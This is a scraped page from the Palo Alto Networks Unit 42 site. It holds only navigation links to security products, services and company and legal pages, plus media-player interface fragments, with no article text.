* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/content/pan/en_US/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
